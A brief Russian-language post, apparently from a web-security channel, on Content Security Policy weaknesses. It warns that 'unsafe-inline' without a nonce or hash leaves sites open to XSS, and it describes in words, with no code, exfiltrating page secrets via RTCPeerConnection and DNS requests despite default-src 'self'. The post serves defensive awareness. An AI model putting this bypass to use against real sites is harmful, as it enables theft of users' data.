Если для корректной работы ресурса необходимо использовать unsafe-inline, обязательно нужно внедрить nonce или hash-source, без этого защита от атак типа XSS сходит на нет. А если CSP не защищает от атак, какой в нем смысл?

Дополнительно, как рассказал знакомый пентестер, данные со страницы можно увести с помощью RTCPeerConnection, передавая секрет через DNS-запросы. Default-src 'self', к сожалению, не защищает и от этого.

Наш канал - https://t.me/webhack_kakao